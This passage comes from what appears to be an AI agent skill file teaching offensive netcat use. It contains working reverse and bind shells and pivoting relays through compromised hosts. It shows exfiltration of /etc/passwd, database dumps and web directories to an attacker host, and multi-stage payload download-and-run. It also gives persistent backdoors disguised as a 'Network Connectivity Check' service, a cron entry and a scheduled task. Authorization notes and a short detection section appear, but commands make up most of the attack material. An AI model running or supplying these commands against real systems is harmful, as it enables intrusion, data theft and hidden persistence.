System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Upgrade reverse shell to interactive 
TTY","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Python PTY upgrade\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Background shell with Ctrl+Z, then:\nstty raw -echo; fg\nexport TERM=xterm\nexport SHELL=/bin/bash","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Bind Shells (Authorized Testing Only)","type":"text"}]},{"type":"paragraph","content":[{"text":"Create listening shell on target machine:","type":"text"}]},{"type":"paragraph","content":[{"text":"Target machine (listener with shell)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Linux bind shell\nnc -lvnp 4444 -e /bin/bash\n\n# Without -e flag\nrm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp 4444 > /tmp/f\n\n# Windows bind shell\nncat.exe -lvnp 4444 -e cmd.exe","type":"text"}]},{"type":"paragraph","content":[{"text":"Attacker machine (connect to bind shell)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"nc \u003ctarget-ip> 4444","type":"text"}]},{"type":"paragraph","content":[{"text":"Bind shell vs Reverse shell","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Bind Shell","type":"text","marks":[{"type":"strong"}]},{"text":": Target listens, attacker connects (blocked by outbound firewalls)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reverse Shell","type":"text","marks":[{"type":"strong"}]},{"text":": Attacker listens, target connects (bypasses inbound firewall 
rules)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. File Transfers","type":"text"}]},{"type":"paragraph","content":[{"text":"Transfer files between systems:","type":"text"}]},{"type":"paragraph","content":[{"text":"Receiving file (listener)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Receive file on port 5555\nnc -lvnp 5555 > received_file.txt","type":"text"}]},{"type":"paragraph","content":[{"text":"Sending file (connector)","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Send file to listener\nnc \u003creceiver-ip> 5555 \u003c file_to_send.txt\n\n# With progress indication\npv file_to_send.txt | nc \u003creceiver-ip> 5555","type":"text"}]},{"type":"paragraph","content":[{"text":"Directory/archive transfer","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Sender: tar and compress directory, send via netcat\ntar czf - /path/to/directory | nc \u003creceiver-ip> 5555\n\n# Receiver: receive and extract\nnc -lvnp 5555 | tar xzf -","type":"text"}]},{"type":"paragraph","content":[{"text":"Large file transfer with verification","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Sender: calculate checksum before sending\nmd5sum large_file.iso\ncat large_file.iso | nc \u003creceiver-ip> 5555\n\n# Receiver: receive and verify\nnc -lvnp 5555 > large_file.iso\nmd5sum large_file.iso","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. 
Encrypted File Transfer","type":"text"}]},{"type":"paragraph","content":[{"text":"Use ncat with SSL for encrypted transfers:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Receiver with SSL\nncat -lvnp 5555 --ssl > received_file.txt\n\n# Sender with SSL\nncat \u003creceiver-ip> 5555 --ssl \u003c file_to_send.txt\n\n# Generate self-signed certificate for ncat\nopenssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key\nncat -lvnp 5555 --ssl --ssl-cert cert.pem --ssl-key cert.key","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"9. Relay and Pivoting","type":"text"}]},{"type":"paragraph","content":[{"text":"Create relay connections through compromised hosts:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Simple relay: forward connections from port 8080 to internal host\nmkfifo backpipe\nnc -lvnp 8080 0\u003cbackpipe | nc \u003cinternal-target-ip> 80 1>backpipe\n\n# Two-way relay\nnc -lvnp 8080 -c \"nc \u003cinternal-target-ip> 80\"\n\n# Use ncat for more reliable relay\nncat -lvnp 8080 --sh-exec \"ncat \u003cinternal-target-ip> 80\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Pivot chain example","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Compromised Host A (DMZ): relay to internal network\nnc -lvnp 9090 -c \"nc 192.168.1.100 3389\"\n\n# Attacker: connect through pivot\nnc \u003ccompromised-host-a> 9090","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"10. 
Chat and Communication","type":"text"}]},{"type":"paragraph","content":[{"text":"Simple chat server for covert communication:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Host 1 (listener)\nnc -lvnp 6666\n\n# Host 2 (connector)\nnc \u003chost1-ip> 6666","type":"text"}]},{"type":"paragraph","content":[{"text":"Two-way communication","type":"text","marks":[{"type":"strong"}]},{"text":": Both parties can type and messages appear on both sides.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Considerations","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Authorization & Legal Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Written Permission","type":"text","marks":[{"type":"strong"}]},{"text":": Obtain explicit authorization for all netcat operations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Shell Access","type":"text","marks":[{"type":"strong"}]},{"text":": Reverse/bind shells are invasive, require clear authorization","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data Exfiltration","type":"text","marks":[{"type":"strong"}]},{"text":": File transfers may trigger DLP alerts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Covert Channels","type":"text","marks":[{"type":"strong"}]},{"text":": Relay connections can bypass security controls","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Cleanup","type":"text","marks":[{"type":"strong"}]},{"text":": Remove all shells, listeners, and backdoors post-engagement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Operational 
Security","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Encryption","type":"text","marks":[{"type":"strong"}]},{"text":": Use ncat with --ssl for encrypted connections","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Logging","type":"text","marks":[{"type":"strong"}]},{"text":": Netcat leaves minimal forensic artifacts but connections are logged","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detection","type":"text","marks":[{"type":"strong"}]},{"text":": IDS/IPS may detect common reverse shell patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Egress Filtering","type":"text","marks":[{"type":"strong"}]},{"text":": Outbound connections may be blocked","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Port Selection","type":"text","marks":[{"type":"strong"}]},{"text":": Use common ports (80, 443, 53) to blend with normal traffic","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Audit Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"Document all netcat activities:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Connection timestamps and duration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Source and destination IP addresses and ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Type of operation (shell, file transfer, relay)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Commands executed through shells","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Files 
transferred","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Any errors or connection failures","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1059.004 (Unix Shell)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1071.001 (Web Protocols)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1090 (Proxy/Multi-hop Proxy)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"T1105 (Ingress Tool Transfer)","type":"text"}]}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PTES","type":"text","marks":[{"type":"strong"}]},{"text":": Exploitation and post-exploitation phases","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP","type":"text","marks":[{"type":"strong"}]},{"text":": Command injection testing methodology","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Patterns","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 1: Web Server Vulnerability Validation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Test for command injection vulnerability\necho -e \"GET /?cmd=id HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80\n\n# SQL injection parameter testing\necho -e \"GET /page?id=1' OR '1'='1 HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 80\n\n# Test HTTP methods\necho -e \"OPTIONS / HTTP/1.0\\r\\n\\r\\n\" | nc \u003ctarget-ip> 
80","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 2: Multi-stage Payload Delivery","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Stage 1: Attacker listener\nnc -lvnp 4444 > stage2_payload.sh\n\n# Stage 2: Target downloads next stage\nnc \u003cattacker-ip> 4444 \u003c /dev/null > /tmp/stage2.sh\nchmod +x /tmp/stage2.sh\n/tmp/stage2.sh\n\n# Stage 3: Execute downloaded payload\n# (payload establishes full reverse shell)","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 3: Data Exfiltration","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Exfiltrate sensitive files\ncat /etc/passwd | nc \u003cattacker-ip> 5555\n\n# Exfiltrate database dump\nmysqldump -u root -p database_name | nc \u003cattacker-ip> 5555\n\n# Compress and exfiltrate directory\ntar czf - /var/www/html | nc \u003cattacker-ip> 5555\n\n# Receiver\nnc -lvnp 5555 > exfiltrated_data.tar.gz","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Pattern 4: Persistent Backdoor (Authorized Testing)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Create systemd service for persistence (Linux)\ncat > /etc/systemd/system/netcat-backdoor.service \u003c\u003cEOF\n[Unit]\nDescription=Network Connectivity Check\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=/bin/nc \u003cattacker-ip> 4444 -e /bin/bash\nRestart=always\nRestartSec=60\n\n[Install]\nWantedBy=multi-user.target\nEOF\n\nsystemctl enable netcat-backdoor.service\nsystemctl start netcat-backdoor.service\n\n# Cron-based persistence\n(crontab -l; echo \"@reboot /bin/nc \u003cattacker-ip> 4444 -e /bin/bash\") | crontab -\n\n# Windows scheduled task\nschtasks /create /tn \"NetworkCheck\" /tr \"C:\\ncat.exe \u003cattacker-ip> 4444 -e cmd.exe\" /sc onstart /ru 
System","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Integration Points","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Metasploit Integration","type":"text"}]},{"type":"paragraph","content":[{"text":"Use netcat as post-exploitation utility:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Metasploit session backgrounding and netcat shell\nmeterpreter > execute -f nc -a \"\u003cattacker-ip> 4444 -e /bin/bash\"\n\n# Upload netcat to target\nmeterpreter > upload /usr/bin/nc /tmp/nc\nmeterpreter > shell\nsh-4.2$ /tmp/nc \u003cattacker-ip> 5555 -e /bin/bash","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scripting and Automation","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"#!/bin/bash\n# automated_shell_catcher.sh - Automatic reverse shell handler\n\nPORT=4444\nLOG_DIR=\"shells/$(date +%Y%m%d)\"\nmkdir -p \"$LOG_DIR\"\n\nwhile true; do\n TIMESTAMP=$(date +%H%M%S)\n echo \"[*] Listening on port $PORT...\"\n nc -lvnp $PORT | tee \"$LOG_DIR/shell_$TIMESTAMP.log\"\n echo \"[*] Connection closed, restarting listener...\"\n sleep 2\ndone","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: \"nc: command not found\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Install netcat (Ubuntu/Debian)\nsudo apt-get install netcat-traditional\nsudo apt-get install netcat-openbsd\n\n# Install ncat (Nmap project, more features)\nsudo apt-get install ncat\n\n# Check available version\nwhich nc ncat netcat","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: \"-e flag not 
supported\"","type":"text"}]},{"type":"paragraph","content":[{"text":"Solution","type":"text","marks":[{"type":"strong"}]},{"text":": Use alternative technique with named pipes:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Linux reverse shell without -e\nrm /tmp/f; mkfifo /tmp/f\ncat /tmp/f | /bin/sh -i 2>&1 | nc \u003cattacker-ip> 4444 > /tmp/f\n\n# Or use ncat which supports -e\nncat \u003cattacker-ip> 4444 -e /bin/bash","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Connection Dies Immediately","type":"text"}]},{"type":"paragraph","content":[{"text":"Causes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Firewall blocking connection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"No interactive prompt keeping connection alive","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Process killed by security software","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Keep connection alive with while loop\nwhile true; do nc \u003cattacker-ip> 4444 -e /bin/bash; sleep 10; done\n\n# Use ncat with keep-alive\nncat -lvnp 4444 --keep-open\n\n# Add reconnection logic\nwhile true; do nc \u003cattacker-ip> 4444 -e /bin/bash 2>/dev/null; sleep 60; done","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Can't Get Interactive Shell","type":"text"}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Upgrade to PTY 
shell\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\n\n# Set terminal type\nexport TERM=xterm\n\n# Enable raw mode (for Ctrl+C, etc.)\n# On attacker machine, background shell with Ctrl+Z:\nstty raw -echo; fg","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Defensive Considerations","type":"text"}]},{"type":"paragraph","content":[{"text":"Organizations can detect netcat activity by:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Process Monitoring","type":"text","marks":[{"type":"strong"}]},{"text":": Detect nc/ncat process execution","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network Monitoring","type":"text","marks":[{"type":"strong"}]},{"text":": Unusual outbound connections to non-standard ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Command-Line Auditing","type":"text","marks":[{"type":"strong"}]},{"text":": Monitor for -e flag usage","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Traffic Analysis","type":"text","marks":[{"type":"strong"}]},{"text":": Unencrypted shell traffic patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"File Integrity","type":"text","marks":[{"type":"strong"}]},{"text":": Detect unauthorized netcat binaries","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Enhance defensive posture:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Block outbound connections to non-business ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor for process execution from unusual locations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deploy EDR solutions to detect reverse shell 
patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable egress filtering on firewalls","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Audit Sysmon Event ID 1 (Process Creation) for nc/ncat","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect named pipe creation (Linux: mkfifo)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor cron jobs and systemd services for suspicious entries","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Ncat Users' Guide","type":"text","marks":[{"type":"link","attrs":{"href":"https://nmap.org/ncat/guide/index.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"GTFOBins: netcat","type":"text","marks":[{"type":"link","attrs":{"href":"https://gtfobins.github.io/gtfobins/nc/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK: Command and Scripting Interpreter","type":"text","marks":[{"type":"link","attrs":{"href":"https://attack.mitre.org/techniques/T1059/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PTES: Post Exploitation","type":"text","marks":[{"type":"link","attrs":{"href":"http://www.pentest-standard.org/index.php/Post_Exploitation","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reverse Shell Cheat 
Sheet","type":"text","marks":[{"type":"link","attrs":{"href":"https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","title":null}}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"network-netcat","tags":["networking","netcat","reverse-shell","file-transfer","port-scanning","banner-grabbing"],"author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/agentsecops/network-netcat/SKILL.md","repo_owner":"aiskillstore","body_sha256":"13382617691b38127d8a026eaeec9de372de51358fe51336d332fee06ce51ed7","cluster_key":"40c545560d7abbcd7e914495cbba920bdc7b72b25e0ac3f94cebda2c79742f51","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/agentsecops/network-netcat/SKILL.md","attachments":[{"id":"39cc49c0-4783-5a15-97ae-344b6bfd6513","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/39cc49c0-4783-5a15-97ae-344b6bfd6513/attachment.yml","path":"assets/ci-config-template.yml","size":11105,"sha256":"0fc554799a0e03a44883990f208f2a428f3c1e70eed1a9bcfbc01e728962b91e","contentType":"application/yaml; charset=utf-8"},{"id":"8c2234f9-c018-5adb-bf81-14ba5d97d975","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/8c2234f9-c018-5adb-bf81-14ba5d97d975/attachment.yaml","path":"assets/rule-template.yaml","size":11044,"sha256":"cb228a390bcd3745cafb1783c6337d9106ae179e853935ae19c90caac10a0497","contentType":"application/yaml; charset=utf-8"},{"id":"00b41a4c-aec9-53e5-9aa2-6c0acad7922d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/00b41a4c-aec9-53e5-9aa2-6c0acad7922d/attachment.md","path":"references/EXAMPLE.md","size":15672,"sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f","contentType":"text/markdown; 
charset=utf-8"},{"id":"1ed1d073-7daa-5083-8b3b-40b5540735dd","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/1ed1d073-7daa-5083-8b3b-40b5540735dd/attachment.md","path":"references/WORKFLOW_CHECKLIST.md","size":8390,"sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f","contentType":"text/markdown; charset=utf-8"},{"id":"72526846-9b6c-56fc-9425-c7b41156c285","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/72526846-9b6c-56fc-9425-c7b41156c285/attachment.json","path":"skill-report.json","size":35540,"sha256":"c5481234c5334d5c7aba4737ef83bc713e0a5dbefb8350e40348446f3e5e35f9","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"f01d72f0500cbb4dbbcfbbc14f7dbaf4ad2c808b4e613df5d3de81e523817eda","attachment_count":5,"text_attachments":5,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/agentsecops/network-netcat/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","frameworks":["MITRE-ATT&CK","PTES"],"import_tag":"clean-skills-v1","maintainer":"[email protected]","references":["https://nmap.org/ncat/guide/index.html","https://attack.mitre.org/techniques/T1059/"],"description":"Network utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.\n","dependencies":{"packages":["netcat","ncat"]}}},"renderedAt":1782987164655}
